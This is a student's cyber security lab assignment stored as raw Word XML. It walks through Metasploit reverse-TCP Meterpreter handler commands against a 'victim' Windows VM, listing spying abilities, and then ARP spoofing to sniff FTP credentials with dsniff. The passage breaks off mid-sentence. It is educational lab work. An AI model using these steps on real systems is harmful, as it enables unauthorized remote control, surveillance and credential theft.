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1BA2" w:rsidRPr="007D0F16" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA2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CYBER SECURITY-</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0F16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>ASSIGNMENT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0F16">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DAY 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0F16">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30</w:t>
      </w:r>
      <w:r w:rsidRPr="007D0F16">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/08/2020</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06EBA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Name-Liza D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA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payload for windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA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Transfer the payload to the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRPr="00BF5414" w:rsidRDefault="000A1BA2" w:rsidP="00BF541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Exploit the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRPr="00555B08" w:rsidRDefault="000A1BA2" w:rsidP="000A1BA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00555B08">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Solution= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF5414" w:rsidRPr="00034CC1" w:rsidRDefault="00BF5414" w:rsidP="00BF5414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/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824230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5581650" cy="4301490"/>
            <wp:effectExtent l="19050" t="0" r="0" b="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6F66" w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open Kali Linux VM and enter into root.</w:t>
      </w:r>
      <w:r w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Type the command “</w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl enable</w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” and then open git for windows. In git enter “</w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ssh bpg@&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00FE5B0C" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip address</w:t>
      </w:r>
      <w:r w:rsidR="00C96F66" w:rsidRPr="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00034CC1" w:rsidRPr="00DA1C55" w:rsidRDefault="00BF5414" w:rsidP="00DA1C55">
      <w:pPr>
        <w:ind w:left="204"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs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pict>
          <v:group id="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:10.55pt;width:428.25pt;height:206.2pt;z-index:-251656192;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1440,211" coordsize="9360,50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440;top:211;width:9360;height:5050" stroked="t" strokecolor="white [3212]">
              <v:imagedata r:id="rId6" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:3859;top:892;width:2573;height:250">
              <v:imagedata r:id="rId7" o:title=""/>
            </v:shape>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and type “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Metasploit framework will </w:t>
      </w:r>
      <w:r w:rsidR="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>start;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the system will run on msf5.</w:t>
      </w:r>
      <w:r w:rsidR="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Type the command “</w:t>
      </w:r>
      <w:r w:rsidR="00034CC1" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00034CC1" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” and then “</w:t>
      </w:r>
      <w:r w:rsidR="00034CC1" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidR="00034CC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have </w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55" w:rsidRPr="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>created</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55" w:rsidRPr="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection an</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d waiting for</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55" w:rsidRPr="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the victim </w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55" w:rsidRPr="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>open and download the payload we will able to exploit his</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/her</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55" w:rsidRPr="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> whole system</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. As the victim downloads and execute the file we will be getting the info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1BA2" w:rsidRDefault="00BF5414" w:rsidP="00BF5414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5414">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4782852" cy="3219450"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="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068" cy="32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br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00582580">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Type “</w:t>
      </w:r>
      <w:r w:rsidR="00582580" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidR="00582580">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” and if LHOST is not appearing then we have to set the IP address again. Now we type the command “</w:t>
      </w:r>
      <w:r w:rsidR="00582580" w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exploit –j –z</w:t>
      </w:r>
      <w:r w:rsidR="00582580">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="003778C0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE5B0C" w:rsidRDefault="00FE5B0C" w:rsidP="00BF5414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3848100" cy="5181600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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947" cy="51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0C" w:rsidRDefault="00FE5B0C" w:rsidP="00BF54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Type the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sessions –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” and we will get into meterpreter. Then type “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5B0C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” and we will be able to see we are </w:t>
      </w:r>
      <w:r w:rsidR="00D0446B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">in windows machine. The exploit can be compromised in several ways such as – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidR="00D0446B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wnload/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload files</w:t>
      </w:r>
      <w:r w:rsidR="00D0446B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, take</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00D0446B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, audio/video recording and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00157FCD" w:rsidRDefault="00157FCD" w:rsidP="00BF5414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00157FCD" w:rsidRDefault="00157FCD" w:rsidP="00BF54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2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00157FCD" w:rsidRDefault="00157FCD" w:rsidP="00157FC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an FTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00157FCD" w:rsidRDefault="00157FCD" w:rsidP="00157FC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Access FTP server from windows command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003778C0" w:rsidRPr="003778C0" w:rsidRDefault="00157FCD" w:rsidP="003778C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Do </w:t>
      </w:r>
      <w:r w:rsidR="00FB3357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 mitm and username and password of FTP transaction using wireshark and dsniff.</w:t>
      </w:r>
      <w:r w:rsidRPr="003778C0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00157FCD" w:rsidRPr="00555B08" w:rsidRDefault="00DA1C55" w:rsidP="003778C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00555B08">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Solution=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB3357" w:rsidRPr="00FB3357" w:rsidRDefault="00555B08" w:rsidP="00FB3357">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The VM</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> machines should be set on the same network</w:t>
      </w:r>
      <w:r w:rsidR="001112FA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(NAT) and we should enable automatic IPv4 address.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> We need to choose FTP server from Web Server (IAS).</w:t>
      </w:r>
      <w:r w:rsidR="00DA1C55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB3357">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB3357" w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We conduct an </w:t>
      </w:r>
      <w:r w:rsidR="00FB3357" w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidR="00FB3357" w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>scan of the local network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1C55" w:rsidRDefault="00DA1C55" w:rsidP="00157FCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB3357" w:rsidRDefault="00BC07CB" w:rsidP="00FB3357">
      <w:r w:rsidRPr="00BC07CB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4200525" cy="3143663"/>
            <wp:effectExtent l="19050" t="0" r="9525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460" cy="314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57" w:rsidRDefault="00FB3357" w:rsidP="00FB3357">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB3357" w:rsidRPr="00FB3357" w:rsidRDefault="00FB3357" w:rsidP="00FB3357">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We can then spoof the ARP request pack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ets of the 2 end-users</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> communicating with each other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB335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Then</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we keep sniffing for data using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">dsniff </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB3357">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
